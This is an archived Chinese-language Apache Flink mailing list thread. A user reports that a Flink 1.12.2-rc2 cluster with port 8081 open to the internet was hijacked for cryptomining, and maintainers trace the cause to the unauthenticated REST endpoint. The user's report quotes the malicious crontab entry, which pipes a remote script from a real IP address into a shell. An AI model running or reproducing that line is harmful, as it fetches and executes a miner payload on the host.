flink 1.12.2-rc2 被挖矿

classic Classic list List threaded Threaded
7 messages Options
Reply | Threaded
Open this post in threaded view
|

flink 1.12.2-rc2 被挖矿

macdoor
我编译的flink 1.12.2-rc2 被挖矿,这个漏洞之前不是堵住了吗?



--
Sent from: http://apache-flink.147419.n8.nabble.com/
Reply | Threaded
Open this post in threaded view
|

Re: flink 1.12.2-rc2 被挖矿

Yu Li
能再给一些细节吗?确认是Flink的问题导致的吗?怀疑的漏洞是哪个?

最近1.12.2 rc2正在release voting阶段,我们希望尽快确认是否存在安全漏洞并及时修复(如果有),谢谢。

Best Regards,
Yu


On Mon, 1 Mar 2021 at 13:26, macdoor <[hidden email]> wrote:

> 我编译的flink 1.12.2-rc2 被挖矿,这个漏洞之前不是堵住了吗?
>
>
>
> --
> Sent from: http://apache-flink.147419.n8.nabble.com/
>
Reply | Threaded
Open this post in threaded view
|

Re: flink 1.12.2-rc2 被挖矿

macdoor
我自己编译
https://github.com/apache/flink/archive/release-1.12.2-rc2.tar.gz,然后部署在了服务器上,为了更新操作系统补丁,绑定了公网ip,这时
jobmanager 的 8081 端口就暴露在互联网上了,然后就有挖矿程序来了,在crontab 中增加了这行
* * * * * curl http://195.3.146.118/spr.sh | sh > /dev/null 2>&1

之前使用 1.10时也遇到过类似情况,我记得 1.12 似乎没有这个问题了,所以这次没有留意,就过有发生了,我基本可以确定是 flink
引起的,因为服务器是全新安装的,只启动了 flink 进程



--
Sent from: http://apache-flink.147419.n8.nabble.com/
Reply | Threaded
Open this post in threaded view
|

Re: flink 1.12.2-rc2 被挖矿

Yu Li
Hi,

从上述描述上看,并不能确认是Flink的安全漏洞,建议进行更多测试,确认之后再向Flink社区报告。

近期已知的Flink安全漏洞包括CVE-2020-1960
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1960>,
CVE-2020-17518
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17518>和
CVE-2020-17519
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17519>
 [1],可以确认这些漏洞在1.12.2-rc2中已全部修复,且不存在regression。

Best Regards,
Yu

[1] https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=apache+flink


On Tue, 2 Mar 2021 at 09:48, macdoor <[hidden email]> wrote:

> 我自己编译
> https://github.com/apache/flink/archive/release-1.12.2-rc2.tar.gz
> ,然后部署在了服务器上,为了更新操作系统补丁,绑定了公网ip,这时
> jobmanager 的 8081 端口就暴露在互联网上了,然后就有挖矿程序来了,在crontab 中增加了这行
> * * * * * curl http://195.3.146.118/spr.sh | sh > /dev/null 2>&1
>
> 之前使用 1.10时也遇到过类似情况,我记得 1.12 似乎没有这个问题了,所以这次没有留意,就过有发生了,我基本可以确定是 flink
> 引起的,因为服务器是全新安装的,只启动了 flink 进程
>
>
>
> --
> Sent from: http://apache-flink.147419.n8.nabble.com/
Reply | Threaded
Open this post in threaded view
|

Re: flink 1.12.2-rc2 被挖矿

macdoor
我不是安全专家,不知道如何才能确认是 flink 的问题,但从现象看跟之前 flink 1.10
遇到的问题非常类似,建议你们能有这方面的测试用例,也能把测试结果提供出来



--
Sent from: http://apache-flink.147419.n8.nabble.com/
Reply | Threaded
Open this post in threaded view
|

Re:Re: flink 1.12.2-rc2 被挖矿

Michael Ran
网络层面 不会直接到公网才对,是开了什么吧?
在 2021-03-02 13:04:41,"macdoor" <[hidden email]> 写道:
>我不是安全专家,不知道如何才能确认是 flink 的问题,但从现象看跟之前 flink 1.10
>遇到的问题非常类似,建议你们能有这方面的测试用例,也能把测试结果提供出来
>
>
>
>--
>Sent from: http://apache-flink.147419.n8.nabble.com/
Reply | Threaded
Open this post in threaded view
|

Re: Re: flink 1.12.2-rc2 被挖矿

Yang Wang
根本原因还是因为你把8081端口暴露在了公网上面,并且Flink的rest endpoint默认是没有鉴权的
所以可以任意提交jar进行运行

你应该用的是session模式吧,application模式默认是把web提交任务关闭了的


Best,
Yang

Michael Ran <[hidden email]> 于2021年3月3日周三 上午11:03写道:

> 网络层面 不会直接到公网才对,是开了什么吧?
> 在 2021-03-02 13:04:41,"macdoor" <[hidden email]> 写道:
> >我不是安全专家,不知道如何才能确认是 flink 的问题,但从现象看跟之前 flink 1.10
> >遇到的问题非常类似,建议你们能有这方面的测试用例,也能把测试结果提供出来
> >
> >
> >
> >--
> >Sent from: http://apache-flink.147419.n8.nabble.com/
>